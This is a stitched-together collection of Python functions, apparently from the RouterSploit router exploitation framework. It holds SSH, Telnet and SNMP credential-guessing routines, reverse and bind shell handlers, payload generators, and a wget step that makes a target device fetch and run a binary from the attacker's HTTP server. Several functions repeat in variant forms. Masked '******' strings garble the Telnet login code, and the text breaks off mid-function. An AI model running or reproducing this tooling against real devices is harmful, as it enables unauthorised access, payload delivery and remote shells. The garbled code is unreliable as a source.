def login_pkey(self, username: str, priv_key: str, retries: int = 1) -> bool:
""" Login to SSH server with private key
:param str username: SSH account username
:param str priv_key: SSH account private key
:param int retries: number of login retries
:return bool: True if login was successful, False otherwise
"""
if "DSA PRIVATE KEY" in priv_key:
priv_key = paramiko.DSSKey.from_private_key(io.StringIO(priv_key))
elif "RSA PRIVATE KEY" in priv_key:
priv_key = paramiko.RSAKey.from_private_key(io.StringIO(priv_key))
else:
return False
for _ in range(retries):
try:
self.ssh_client.connect(self.ssh_target, self.ssh_port, timeout=SSH_TIMEOUT, banner_timeout=SSH_TIMEOUT, username=username, pkey=priv_key, look_for_keys=False)
except paramiko.AuthenticationException:
print_error(self.peer, "SSH Authentication Failed - Username: '******' auth with private key".format(username), verbose=self.verbosity)
except Exception as err:
print_error(self.peer, "SSH Error while authenticated by using private key", err, verbose=self.verbosity)
else:
print_success(self.peer, "SSH Authentication Successful - Username: '******' with private key".format(username), verbose=self.verbosity)
return True
self.ssh_client.close()
return False
def reverse_tcp(self):
all_interfaces = "0.0.0.0"
sock = self.listen(all_interfaces, self.options["lport"])
if self.port_used:
print_error("Could not set up listener on {}:{}".format(all_interfaces, self.options["lport"]))
return
# execute binary
commands = self.build_commands()
print_status("Executing payload on the device")
# synchronized commands
for command in commands[:-1]:
self.exploit.execute(command)
# asynchronous last command to execute binary & rm binary
thread = threading.Thread(target=self.exploit.execute, args=(commands[-1],))
thread.start()
# waiting for shell
print_status("Waiting for reverse shell...")
client, addr = sock.accept()
sock.close()
print_status("Connection from {}:{}".format(addr[0], addr[1]))
print_success("Enjoy your shell")
t = telnetlib.Telnet()
t.sock = client
t.interact()
def get(self, community_string: str, oid: str, version: int = 1, retries: int = 0) -> bytes:
""" Get OID from SNMP server
:param str community_string: SNMP server communit string
:param str oid: SNMP server oid
:param int version: SNMP protocol version
:param int retries: number of retries
:return bytes: SNMP server response
"""
cmdGen = cmdgen.CommandGenerator()
try:
errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd(
cmdgen.CommunityData(community_string, mpModel=version),
cmdgen.UdpTransportTarget((self.snmp_target, self.snmp_port), timeout=SNMP_TIMEOUT, retries=retries),
oid,
)
except Exception as err:
print_error(self.peer, "SNMP Error while accessing server", err, verbose=self.verbosity)
return None
if errorIndication or errorStatus:
print_error(self.peer, "SNMP invalid community string: '{}'".format(community_string), verbose=self.verbosity)
else:
print_success(self.peer, "SNMP valid community string found: '{}'".format(community_string), verbose=self.verbosity)
return varBinds
return None
def login(self, username: str, password: str, retries: int = 1) -> bool:
""" Login to SSH server
:param str username: SSH account username
:param str password: SSH account password
:param int retries: number of login retries
:return bool: True if login was successful, False otherwise
"""
for _ in range(retries):
try:
self.ssh_client.connect(self.ssh_target, self.ssh_port, timeout=SSH_TIMEOUT, banner_timeout=SSH_TIMEOUT, username=username, password=password, look_for_keys=False)
except paramiko.AuthenticationException:
print_error(self.peer, "SSH Authentication Failed - Username: '******' Password: '******'".format(username, password), verbose=self.verbosity)
self.ssh_client.close()
break
except Exception as err:
print_error(self.peer, "SSH Error while authenticating", err, verbose=self.verbosity)
else:
print_success(self.peer, "SSH Authentication Successful - Username: '******' Password: '******'".format(username, password), verbose=self.verbosity)
return True
self.ssh_client.close()
return False
def _windows_shell(self, chan: paramiko.channel.Channel) -> None:
""" Start Windows shell with SSH server
:param paramiko.channel.Channel chan: channel for communicating with SSH server
:return None:
"""
def writeall(sock):
while True:
data = sock.recv(256)
if not data:
sys.stdout.flush()
return
sys.stdout.write(data)
sys.stdout.flush()
writer = threading.Thread(target=writeall, args=(chan,))
writer.start()
try:
while True:
d = sys.stdin.read(1)
if not d:
break
chan.send(d)
except Exception as err:
print_error("Error", err, verbose=self.verbosity)
def bind_tcp(self):
# execute binary
commands = self.build_commands()
# synchronized commands
for command in commands[:-1]:
self.exploit.execute(command)
# asynchronous last command to execute binary & rm binary
thread = threading.Thread(target=self.exploit.execute, args=(commands[-1],))
thread.start()
# connecting to shell
print_status("Connecting to {}:{}".format(self.options['rhost'], self.options['rport']))
time.sleep(2)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.options["rhost"], int(self.options["rport"])))
except socket.error:
print_error("Could not connect to {}:{}".format(self.options["rhost"], self.options["rport"]))
return
print_success("Enjoy your shell")
tn = telnetlib.Telnet()
tn.sock = sock
tn.interact()
def http_request(self, method: str, path: str, session: requests = requests, **kwargs) -> requests.Response:
""" Requests HTTP resource
:param str method: method that should be issued e.g. GET, POST
:param str path: path to the resource that should be requested
:param requests session: session manager that should be used
:param kwargs: kwargs passed to request method
:return Response: Response object
"""
if self.ssl:
url = "https://"
else:
url = "http://"
url += "{}:{}{}".format(self.target, self.port, path)
kwargs.setdefault("timeout", HTTP_TIMEOUT)
kwargs.setdefault("verify", False)
kwargs.setdefault("allow_redirects", False)
try:
return getattr(session, method.lower())(url, **kwargs)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: {}".format(url), verbose=self.verbosity)
except requests.exceptions.ConnectionError:
print_error("Connection error: {}".format(url), verbose=self.verbosity)
except requests.RequestException as error:
print_error(error, verbose=self.verbosity)
except socket.error as err:
print_error(err, verbose=self.verbosity)
except KeyboardInterrupt:
print_error("Module has been stopped", verbose=self.verbosity)
return None
def run(self):
print_status("Generating payload")
try:
data = self.generate()
except OptionValidationError as e:
print_error(e)
return
if self.output == "elf":
with open(self.filepath, "wb+") as f:
print_status("Building ELF payload")
content = self.generate_elf(data)
print_success("Saving file {}".format(self.filepath))
f.write(content)
elif self.output == "c":
print_success("Bulding payload for C")
content = self.generate_c(data)
print_info(content)
elif self.output == "python":
print_success("Building payload for python")
content = self.generate_python(data)
print_info(content)
else:
raise OptionValidationError(
"No such option as {}".format(self.output)
)
return content
def login(self, username: str, password: str, retries: int = 1) -> bool:
""" Login to Telnet server
:param str username: Telnet account username
:param str password: Telnet account password
:param int retries: number of authentication retries
:return bool: True if login was successful, False otherwise
"""
for _ in range(retries):
try:
if not self.connect():
continue
self.telnet_client.expect([b"Login: "******"login: "******"Username: "******"username: "******"utf-8") + b"\r\n")
self.telnet_client.expect([b"Password: "******"password: "******"utf-8") + b"\r\n")
self.telnet_client.write(b"\r\n")
(i, obj, res) = self.telnet_client.expect([b"Incorrect", b"incorrect"], 5)
if i == -1 and any([x in res for x in [b"#", b"$", b">"]]) or len(res) > 500: # big banner e.g. mikrotik
print_success(self.peer, "Telnet Authentication Successful - Username: '******' Password: '******'".format(username, password), verbose=self.verbosity)
return True
else:
print_error(self.peer, "Telnet Authentication Failed - Username: '******' Password: '******'".format(username, password), verbose=self.verbosity)
break
except Exception as err:
print_error(self.peer, "Telnet Error while authenticating to the server", err, verbose=self.verbosity)
return False
def http_request(self, method, path, session=requests, **kwargs):
if self.ssl:
url = "https://"
else:
url = "http://"
url += "{}:{}{}".format(self.target, self.port, path)
kwargs.setdefault("timeout", HTTP_TIMEOUT)
kwargs.setdefault("verify", False)
kwargs.setdefault("allow_redirects", False)
try:
return getattr(session, method.lower())(url, **kwargs)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: {}".format(url), verbose=self.verbosity)
except requests.exceptions.ConnectionError:
print_error("Connection error: {}".format(url), verbose=self.verbosity)
except requests.RequestException as error:
print_error(error, verbose=self.verbosity)
except socket.error as err:
print_error(err, verbose=self.verbosity)
except KeyboardInterrupt:
print_error("Module has been stopped", verbose=self.verbosity)
return None
def tcp_send(self, tcp_client, data):
if tcp_client:
if type(data) is bytes:
return tcp_client.send(data)
else:
print_error("Data to send is not type of bytes", verbose=self.verbosity)
return None
def command_show(self, *args, **kwargs):
sub_command = args[0]
try:
getattr(self, "_show_{}".format(sub_command))(*args, **kwargs)
except AttributeError:
print_error("Unknown 'show' sub-command '{}'. "
"What do you want to show?\n"
"Possible choices are: {}".format(sub_command, self.show_sub_commands))
def command_use(self, module_path, *args, **kwargs):
module_path = pythonize_path(module_path)
module_path = ".".join(("routersploit", "modules", module_path))
# module_path, _, exploit_name = module_path.rpartition('.')
try:
self.current_module = import_exploit(module_path)()
except RoutersploitException as err:
print_error(str(err))
def command_run(self, *args, **kwargs):
print_status("Running module...")
try:
self.current_module.run()
except KeyboardInterrupt:
print_info()
print_error("Operation cancelled by user")
except Exception:
print_error(traceback.format_exc(sys.exc_info()))
def command_unsetg(self, *args, **kwargs):
key, _, value = args[0].partition(' ')
try:
del GLOBAL_OPTS[key]
except KeyError:
print_error("You can't unset global option '{}'.\n"
"Available global options: {}".format(key, list(GLOBAL_OPTS.keys())))
else:
print_success({key: value})
def _show_encoders(self, *args, **kwargs):
if issubclass(self.current_module.__class__, BasePayload):
encoders = self.current_module.get_encoders()
if encoders:
headers = ("Encoder", "Name", "Description")
print_table(headers, *encoders, max_column_length=100)
return
print_error("No encoders available")
def udp_send(self, udp_client, data):
if udp_client:
if type(data) is bytes:
try:
return udp_client.sendto(data, (self.target, self.port))
except Exception:
print_error("Exception while sending data", verbose=self.verbosity)
else:
print_error("Data to send is not type of bytes", verbose=self.verbosity)
return None
def udp_create(self):
if is_ipv4(self.target):
udp_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
elif is_ipv6(self.target):
udp_client = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
else:
print_error("Target address is not valid IPv4 nor IPv6 address", verbose=self.verbosity)
return None
udp_client.settimeout(UDP_SOCKET_TIMEOUT)
return udp_client
def udp_recv(self, udp_client, num):
if udp_client:
try:
response = udp_client.recv(num)
return response
except socket.timeout:
print_error("Socket did timeout", verbose=self.verbosity)
except socket.error:
print_error("Socket err", verbose=self.verbosity)
return None
def command_check(self, *args, **kwargs):
try:
result = self.current_module.check()
except Exception as error:
print_error(error)
else:
if result is True:
print_success("Target is vulnerable")
elif result is False:
print_error("Target is not vulnerable")
else:
print_status("Target could not be verified")
def command_set(self, *args, **kwargs):
key, _, value = args[0].partition(" ")
if key in self.current_module.options:
setattr(self.current_module, key, value)
self.current_module.exploit_attributes[key][0] = value
if kwargs.get("glob", False):
GLOBAL_OPTS[key] = value
print_success("{} => {}".format(key, value))
else:
print_error("You can't set option '{}'.\n"
"Available options: {}".format(key, self.current_module.options))
def tcp_connect(self):
try:
tcp_client = self.tcp_create()
tcp_client.connect((self.target, self.port))
print_status("Connection established", verbose=self.verbosity)
return tcp_client
except Exception as err:
print_error("Could not connect", verbose=self.verbosity)
print_error(err, verbose=self.verbosity)
return None
def close(self) -> bool:
""" Close FTP connection
:return bool: True if closing connection was successful, False otherwise
"""
try:
self.ftp_client.close()
return True
except Exception as err:
print_error(self.peer, "FTP Error while closing connection", err, verbose=self.verbosity)
return False
def close(self) -> bool:
""" Close connection to TCP server
:return bool: True if closing connection was successful, False otherwise
"""
try:
self.tcp_client.close()
return True
except Exception as err:
print_error(self.peer, "TCP Error while closing tcp socket", err, verbose=self.verbosity)
return False
def send(self, data: bytes) -> bool:
""" Send data to TCP server
:param bytes data: data that should be sent to TCP server
:return bool: True if sending data was successful, False otherwise
"""
try:
self.tcp_client.send(data)
return True
except Exception as err:
print_error(self.peer, "TCP Error while sending data", err, verbose=self.verbosity)
return False
def connect(self) -> bool:
""" Connect to Telnet server
:return bool: True if connection was successful, False otherwise
"""
try:
self.telnet_client = telnetlib.Telnet(self.telnet_target, self.telnet_port, timeout=TELNET_TIMEOUT)
return True
except Exception as err:
print_error(self.peer, "Telnet Error while connecting to the server", err, verbose=self.verbosity)
return False
def close(self) -> bool:
""" Close UDP connection
:return bool: True if connection was closed successful, False otherwise
"""
try:
self.udp_client.close()
return True
except Exception as err:
print_error(self.peer, "Error while closing udp socket", err, verbose=self.verbosity)
return False
def command_search(self, *args, **kwargs):
keyword = args[0]
if not keyword:
print_error("Please specify search keyword. e.g. 'search cisco'")
return
for module in self.modules:
if keyword in module:
module = humanize_path(module)
print_info(
"{}\033[31m{}\033[0m{}".format(*module.partition(keyword))
)
def recv(self, num: int) -> bytes:
""" Receive UDP data
:param int num: number of bytes that should received from the server
:return bytes: bytes received from the server
"""
try:
response = self.udp_client.recv(num)
return response
except Exception as err:
print_error(self.peer, "Error while receiving data", err, verbose=self.verbosity)
return None
def send(self, data: bytes) -> bool:
""" Send UDP data
:param bytes data: data that should be sent to the server
:return bool: True if data was sent, False otherwise
"""
try:
self.udp_client.sendto(data, (self.udp_target, self.udp_port))
return True
except Exception as err:
print_error(self.peer, "Error while sending data", err, verbose=self.verbosity)
return False
def login(self, username: str, password: str, retries: int = 1) -> bool:
""" Login to SSH server
:param str username: SSH account username
:param str password: SSH account password
:param int retries: number of login retries
:return bool: True if login was successful, False otherwise
"""
for _ in range(retries):
try:
self.ssh_client.connect(self.ssh_target,
self.ssh_port,
timeout=SSH_TIMEOUT,
banner_timeout=SSH_TIMEOUT,
username=username,
password=password,
look_for_keys=False)
except paramiko.AuthenticationException:
print_error(
self.peer,
"SSH Authentication Failed - Username: '******' Password: '******'"
.format(username, password),
verbose=self.verbosity)
self.ssh_client.close()
break
except Exception as err:
print_error(self.peer,
"SSH Error while authenticating",
err,
verbose=self.verbosity)
else:
print_success(
self.peer,
"SSH Authentication Successful - Username: '******' Password: '******'"
.format(username, password),
verbose=self.verbosity)
return True
self.ssh_client.close()
return False
def http_request(self,
method: str,
path: str,
session: requests = requests,
**kwargs) -> requests.Response:
""" Requests HTTP resource
:param str method: method that should be issued e.g. GET, POST
:param str path: path to the resource that should be requested
:param requests session: session manager that should be used
:param kwargs: kwargs passed to request method
:return Response: Response object
"""
if self.ssl:
url = "https://"
else:
url = "http://"
url += "{}:{}{}".format(self.target, self.port, path)
kwargs.setdefault("timeout", HTTP_TIMEOUT)
kwargs.setdefault("verify", False)
kwargs.setdefault("allow_redirects", False)
try:
return getattr(session, method.lower())(url, **kwargs)
except (requests.exceptions.MissingSchema,
requests.exceptions.InvalidSchema):
print_error("Invalid URL format: {}".format(url),
verbose=self.verbosity)
except requests.exceptions.ConnectionError:
print_error("Connection error: {}".format(url),
verbose=self.verbosity)
except requests.RequestException as error:
print_error(error, verbose=self.verbosity)
except socket.error as err:
print_error(err, verbose=self.verbosity)
except KeyboardInterrupt:
print_error("Module has been stopped", verbose=self.verbosity)
return None
def btle_scan(self, mac=None):
""" Scans for Bluetooth Low Energy devices """
options = Options(self.buffering, mac, self.enum_services)
scanner = BTLEScanner(options.mac).withDelegate(ScanDelegate(options))
if options.mac:
print_status("Scanning BTLE device...")
else:
print_status("Scanning for BTLE devices...")
devices = []
try:
devices = [res for res in scanner.scan(self.scan_time)]
except Exception as err:
print_error("Error: {}".format(err))
print_error("Check if your bluetooth hardware is connected")
return devices
def start(self):
""" Routersploit main entry point. Starting interpreter loop. """
print_info(self.banner)
printer_queue.join()
while True:
try:
command, args, kwargs = self.parse_line(input(self.prompt))
if not command:
continue
command_handler = self.get_command_handler(command)
command_handler(args, **kwargs)
except RoutersploitException as err:
print_error(err)
except (EOFError, KeyboardInterrupt, SystemExit):
print_info()
print_error("RouterSploit stopped")
break
finally:
printer_queue.join()
def send_content(self, content: str, dest_file: str) -> bool:
""" Send file content to SSH server
:param str content: data that should be sent to SSH file
:param str dst_file: destination file that data should be saved to
:return bool: True if sending file content was successful, False otherwise
"""
try:
fp_content = io.BytesIO(content)
sftp = self.ssh_client.open_sftp()
sftp.putfo(fp_content, dest_file)
return True
except Exception as err:
print_error(self.peer,
"SSH Error while sending content to the server",
err,
verbose=self.verbosity)
return False
def get_file(self, remote_file: str, local_file: str) -> bool:
""" Get file from SSH server
:param str remote_file: remote file on SSH server
:param str local_file: local file that it should be saved to
:return bool: True if getting file was successful, False otherwise
"""
try:
sftp = self.ssh_client.open_sftp()
sftp.get(remote_file, local_file)
return True
except Exception as err:
print_error(self.peer,
"SSH Error while retrieving file from the server",
err,
verbose=self.verbosity)
return False
def tcp_recv(self, tcp_client, num):
if tcp_client:
try:
response = b""
received = 0
while received < num:
tmp = tcp_client.recv(num - received)
if tmp:
received += len(tmp)
response += tmp
else:
break
return response
except socket.timeout:
print_error("Socket did timeout")
except socket.error:
print_error("Socket error")
return None
def recv_all(self, num):
try:
response = b""
received = 0
while received < num:
tmp = self.tcp_client.recv(num - received)
if tmp:
received += len(tmp)
response += tmp
else:
break
return response
except Exception as err:
print_error(self.peer,
"TCP Error while receiving all data",
err,
verbose=self.verbosity)
return None
def get_content(self, remote_file: str) -> str:
""" Get file content from SSH server
:param str remote_file: remote file on SSH server
:return str: file content from SSH server
"""
try:
fp_content = io.BytesIO()
sftp = self.ssh_client.open_sftp()
sftp.getfo(remote_file, fp_content)
return fp_content.getvalue()
except Exception as err:
print_error(
self.peer,
"SSH Error while retrieving file content from the server",
err,
verbose=self.verbosity)
return None
def telnet_login(self, username, password, target=None, port=None, retries=1):
if not target:
target = self.target
if not port:
port = self.port
for _ in range(retries):
try:
telnet_client = self.telnet_connect(target=target, port=port)
if not telnet_client:
continue
telnet_client.expect([b"Login: "******"login: "******"Username: "******"username: "******"utf-8") + b"\r\n")
telnet_client.expect([b"Password: "******"password: "******"utf-8") + b"\r\n")
telnet_client.write(b"\r\n")
(i, obj, res) = telnet_client.expect([b"Incorrect", b"incorrect"], 5)
if i == -1 and any([x in res for x in [b"#", b"$", b">"]]) or len(res) > 500: # big banner e.g. mikrotik
print_success("Telnet Authentication Successful - Username: '******' Password: '******'".format(username, password), verbose=self.verbosity)
return telnet_client
else:
print_error("Telnet Authentication Failed - Username: '******' Password: '******'".format(username, password), verbose=self.verbosity)
break
except EOFError:
print_error("Telnet connection error", verbose=self.verbosity)
except Exception as err:
print_error(err, verbose=self.verbosity)
return None
def wget(self):
print_status("Using wget method")
self.binary_name = random_text(8)
if "binary" in self.wget_options.keys():
binary = self.wget_options['binary']
else:
binary = "wget"
# run http server
all_interfaces = "0.0.0.0"
try:
server = HttpServer((all_interfaces, int(self.options["lport"])), HttpRequestHandler)
except socket.error:
print_error("Could not set up HTTP Server on {}:{}".format(self.options["lhost"], self.options["lport"]))
return False
thread = threading.Thread(target=server.serve_forever, args=(self.payload,))
thread.start()
# wget binary
print_status("Using wget to download binary")
cmd = "{} http://{}:{}/{} -qO {}/{}".format(binary,
self.options["lhost"],
self.options["lport"],
self.binary_name,
self.location,
self.binary_name)
self.exploit.execute(cmd)
thread.join(10)
if thread.is_alive():
assassin = threading.Thread(target=server.shutdown)
assassin.daemon = True
assassin.start()
return False
return True
def command_set(self, *args, **kwargs):
key, _, value = args[0].partition(" ")
if key in self.current_module.options:
if key == "encoder":
value = self.current_module.get_encoder(value)
if not value:
print_error(
"Encoder not available. Check available encoders with `show encoders`."
)
return
setattr(self.current_module, key, value)
self.current_module.exploit_attributes[key][0] = value
if kwargs.get("glob", False):
GLOBAL_OPTS[key] = value
print_success("{} => {}".format(key, value))
else:
print_error("You can't set option '{}'.\n"
"Available options: {}".format(
key, self.current_module.options))
def test_connect(self) -> bool:
""" Test connection to Telnet server
:return bool: True if test connection was successful, False otherwise
"""
try:
self.telnet_client = telnetlib.Telnet(self.telnet_target,
self.telnet_port,
timeout=TELNET_TIMEOUT)
self.telnet_client.expect(
[b"Login: "******"login: "******"Username: "******"username: "******"Telnet Error while testing connection to the server",
err,
verbose=self.verbosity)
return False
def start(self):
""" exploit main entry point. Starting interpreter loop. """
print_info(self.banner)
printer_queue.join()
while True:
try:
command, args = self.parse_line(input(self.prompt))
if not command:
continue
command_handler = self.get_command_handler(command)
command_handler(args)
except RoutersploitException as err:
print_error(err)
except EOFError:
print_info()
print_status(" stopped")
break
except KeyboardInterrupt:
print_info()
finally:
printer_queue.join()
def login_pkey(self, username: str, priv_key: str, retries: int = 1) -> bool:
""" Login to SSH server with private key
:param str username: SSH account username
:param str priv_key: SSH account private key
:param int retries: number of login retries
:return bool: True if login was successful, False otherwise
"""
if "DSA PRIVATE KEY" in priv_key:
priv_key = paramiko.DSSKey.from_private_key(io.StringIO(priv_key))
elif "RSA PRIVATE KEY" in priv_key:
priv_key = paramiko.RSAKey.from_private_key(io.StringIO(priv_key))
else:
return False
for _ in range(retries):
try:
self.ssh_client.connect(
self.ssh_target,
self.ssh_port,
timeout=SSH_TIMEOUT,
banner_timeout=SSH_TIMEOUT,
username=username,
pkey=priv_key,
look_for_keys=False,
allow_agent=False,
)
except paramiko.AuthenticationException:
print_error(self.peer, "SSH Authentication Failed - Username: '******' auth with private key".format(username), verbose=self.verbosity)
except Exception as err:
print_error(self.peer, "SSH Error while authenticated by using private key", err, verbose=self.verbosity)
else:
print_success(self.peer, "SSH Authentication Successful - Username: '******' with private key".format(username), verbose=self.verbosity)
return True
self.ssh_client.close()
return False
def ssh_test_connect(self):
ssh_client = self.ssh_create()
try:
ssh_client.connect(self.target,
self.port,
timeout=SSH_TIMEOUT,
username="******",
password=random_text(12),
look_for_keys=False)
except paramiko.AuthenticationException:
ssh_client.close()
return True
except socket.error:
print_error("Connection error")
ssh_client.close()
return False
except Exception as err:
print_error("Err: {}".format(err))
ssh_client.close()
return False
def test_connect(self) -> bool:
""" Test connection to SSH server
:return bool: True if test connection was successful, False otherwise
"""
try:
self.ssh_client.connect(self.ssh_target,
self.ssh_port,
timeout=SSH_TIMEOUT,
username="******",
password=random_text(12),
look_for_keys=False)
except paramiko.AuthenticationException:
self.ssh_client.close()
return True
except Exception as err:
print_error(self.peer,
"SSH Error while testing connection",
err,
verbose=self.verbosity)
self.ssh_client.close()
return False
def login(self, username, password, retries=1):
for _ in range(retries):
try:
if not self.connect():
continue
self.telnet_client.expect([b"Login: "******"login: "******"Username: "******"username: "******"utf-8") + b"\r\n")
self.telnet_client.expect([b"Password: "******"password: "******"utf-8") + b"\r\n")
self.telnet_client.write(b"\r\n")
(i, obj, res) = self.telnet_client.expect([b"Incorrect", b"incorrect"], 5)
if i == -1 and any([x in res for x in [b"#", b"$", b">"]]) or len(res) > 500: # big banner e.g. mikrotik
print_success(self.peer, "Telnet Authentication Successful - Username: '******' Password: '******'".format(username, password), verbose=self.verbosity)
return self.telnet_client
else:
print_error(self.peer, "Telnet Authentication Failed - Username: '******' Password: '******'".format(username, password), verbose=self.verbosity)
break
except Exception as err:
print_error(self.peer, "Telnet Error while authenticating to the server", err, verbose=self.verbosity)
return None
def _windows_shell(self, chan):
def writeall(sock):
while True:
data = sock.recv(256)
if not data:
sys.stdout.flush()
return
sys.stdout.write(data)
sys.stdout.flush()
writer = threading.Thread(target=writeall, args=(chan,))
writer.start()
try:
while True:
d = sys.stdin.read(1)
if not d:
break
chan.send(d)
except Exception as err:
print_error("Err: {}".format(err))
def ssh_login_pkey(self, username, priv_key, retries=1):
ssh_client = self.ssh_create()
if "DSA PRIVATE KEY" in priv_key:
priv_key = paramiko.DSSKey.from_private_key(io.StringIO(priv_key))
elif "RSA PRIVATE KEY" in priv_key:
priv_key = paramiko.RSAKey.from_private_key(io.StringIO(priv_key))
else:
return None
for _ in range(retries):
try:
ssh_client.connect(self.target, self.port, timeout=SSH_TIMEOUT, banner_timeout=SSH_TIMEOUT, username=username, pkey=priv_key, look_for_keys=False)
except paramiko.AuthenticationException:
print_error("Authentication Failed - Username: '******' auth with private key".format(username), verbose=self.verbosity)
except Exception as err:
print_error("Err: {}".format(err), verbose=self.verbosity)
else:
print_success("SSH Authentication Successful - Username: '******' with private key".format(username), verbose=self.verbosity)
return ssh_client
ssh_client.close()
return None
def __init__(self, tcp_target: str, tcp_port: int, verbosity: bool=False) -> None:
""" TCP client constructor
:param str tcp_target: target TCP server ip address
:param int tcp_port: target TCP server port
:param bool verbosity: display verbose output
:return None:
"""
self.tcp_target = tcp_target
self.tcp_port = tcp_port
self.verbosity = verbosity
self.peer = "{}:{}".format(self.tcp_target, self.tcp_port)
if is_ipv4(self.tcp_target):
self.tcp_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
elif is_ipv6(self.tcp_target):
self.tcp_client = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
print_error("Target address is not valid IPv4 nor IPv6 address", verbose=self.verbosity)
return None
self.tcp_client.settimeout(TCP_SOCKET_TIMEOUT)
def recv_all(self, num: int) -> bytes:
""" Receive all data sent by the server
:param int num: number of total bytes that should be received
:return bytes: data that was received from the server
"""
try:
response = b""
received = 0
while received < num:
tmp = self.tcp_client.recv(num - received)
if tmp:
received += len(tmp)
response += tmp
else:
break
return response
except Exception as err:
print_error(self.peer, "TCP Error while receiving all data", err, verbose=self.verbosity)
return None
def start(self, argv):
""" Routersploit main entry point. Starting interpreter loop. """
printer_queue.join()
try:
command, args = self.parse_line("use scanners/routers/router_scan")
if not command:
return -1
command_handler = self.get_command_handler(command)
command_handler(args)
except RoutersploitException as err:
print_error(err)
except EOFError:
print_info()
print_status("routersploit stopped")
return -1
except KeyboardInterrupt:
print_info()
finally:
printer_queue.join()
try:
command, args = self.parse_line("set target " + argv)
if not command:
return -1
command_handler = self.get_command_handler(command)
command_handler(args)
except RoutersploitException as err:
print_error(err)
except EOFError:
print_info()
print_status("routersploit stopped")
return -1
except KeyboardInterrupt:
print_info()
finally:
printer_queue.join()
try:
command, args = self.parse_line("run")
if not command:
return -1
command_handler = self.get_command_handler(command)
command_handler(args)
except RoutersploitException as err:
print_error(err)
except EOFError:
print_info()
print_status("routersploit stopped")
return -1
except KeyboardInterrupt:
print_info()
finally:
printer_queue.join()
def write(self, characteristic, data):
try:
dev = Peripheral(self, self.addrType)
services = sorted(dev.services, key=lambda s: s.hndStart)
print_status(
"Searching for characteristic {}".format(characteristic))
char = None
for service in services:
if char is not None:
break
for _, c in enumerate(service.getCharacteristics()):
if str(c.uuid) == characteristic:
char = c
break
if char:
if "WRITE" in char.propertiesToString():
print_success("Sending {} bytes...".format(len(data)))
wwrflag = False
if "NO RESPONSE" in char.propertiesToString():
wwrflag = True
try:
char.write(data, wwrflag)
print_success("Data sent")
except Exception as err:
print_error("Error: {}".format(err))
else:
print_error("Not writable")
dev.disconnect()
except Exception as err:
print_error(err)
try:
dev.disconnect()
except Exception:
pass
return None
def run(self):
print_error("Module cannot be run")
def shell(exploit, architecture="", method="", payloads=None, **params):
available_payloads = {}
payload = None
options = []
if architecture and method:
path = "routersploit/modules/payloads/{}/".format(architecture)
# get all payloads for given architecture
all_payloads = [f.split(".")[0] for f in listdir(path) if isfile(join(path, f)) and f.endswith(".py") and f != "__init__.py"]
payload_path = path.replace("/", ".")
for p in all_payloads:
module = getattr(importlib.import_module("{}{}".format(payload_path, p)), 'Exploit')
# if method/arch is cmd then filter out payloads
if method is "cmd":
if getattr(module, "cmd") in payloads:
available_payloads[p] = module
else:
available_payloads[p] = module
print_info()
print_success("Welcome to cmd. Commands are sent to the target via the execute method.")
print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.")
print_info()
while True:
while not printer_queue.empty():
pass
if payload is None:
cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
else:
cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Exploit__info__["name"])
cmd = input(cmd_str)
if cmd in ["quit", "exit"]:
return
elif cmd == "show payloads":
if not available_payloads:
print_error("There are no available payloads for this exploit")
continue
print_status("Available payloads:")
headers = ("Payload", "Name", "Description")
data = []
for p in available_payloads.keys():
data.append((p, available_payloads[p]._Exploit__info__["name"], available_payloads[p]._Exploit__info__["description"]))
print_table(headers, *data)
elif cmd.startswith("set payload "):
if not available_payloads:
print_error("There are no available payloads for this exploit")
continue
c = cmd.split(" ")
if c[2] in available_payloads.keys():
payload = available_payloads[c[2]]()
options = []
for option in payload.exploit_attributes.keys():
if option not in ["output", "filepath"]:
options.append([option, getattr(payload, option), payload.exploit_attributes[option][1]])
if payload.handler == "bind_tcp":
options.append(["rhost", exploit.target, "Target IP address"])
if method == "wget":
options.append(["lhost", "", "Connect-back IP address for wget"])
options.append(["lport", 4545, "Connect-back Port for wget"])
else:
print_error("Payload not available")
elif payload is not None:
if cmd == "show options":
headers = ("Name", "Current settings", "Description")
print_info('\nPayload Options:')
print_table(headers, *options)
print_info()
elif cmd.startswith("set "):
c = cmd.split(" ")
if len(c) != 3:
print_error("set <option> <value>")
else:
for option in options:
if option[0] == c[1]:
try:
setattr(payload, c[1], c[2])
except Exception:
print_error("Invalid value for {}".format(c[1]))
break
option[1] = c[2]
print_info("{} => {}".format(c[1], c[2]))
elif cmd == "run":
data = payload.generate()
if method == "wget":
elf_binary = payload.generate_elf(data)
communication = Communication(exploit, elf_binary, options, **params)
if communication.wget() is False:
print_error("Exploit failed to transfer payload")
continue
elif method == "echo":
elf_binary = payload.generate_elf(data)
communication = Communication(exploit, elf_binary, options, **params)
communication.echo()
elif method == "cmd":
params["exec_binary"] = data
communication = Communication(exploit, "", options, **params)
if payload.handler == "bind_tcp":
communication.bind_tcp()
elif payload.handler == "reverse_tcp":
communication.reverse_tcp()
elif cmd == "back":
payload = None
else:
print_status("Executing '{}' on the device...".format(cmd))
print_info(exploit.execute(cmd))
def wrapper(self, *args, **kwargs):
if not self.current_module:
print_error("You have to activate any module with 'use' command.")
return
return fn(self, *args, **kwargs)
def command_search(self, *args, **kwargs):
mod_type = ''
mod_detail = ''
mod_vendor = ''
existing_modules = [
name for _, name, _ in pkgutil.iter_modules([MODULES_DIR])
]
devices = [
name for _, name, _ in pkgutil.iter_modules(
[os.path.join(MODULES_DIR, 'exploits')])
]
languages = [
name for _, name, _ in pkgutil.iter_modules(
[os.path.join(MODULES_DIR, 'encoders')])
]
payloads = [
name for _, name, _ in pkgutil.iter_modules(
[os.path.join(MODULES_DIR, 'payloads')])
]
try:
keyword = args[0].strip("'\"").lower()
except IndexError:
keyword = ''
if not (len(keyword) or len(kwargs.keys())):
print_error(
"Please specify at least search keyword. e.g. 'search cisco'")
print_error(
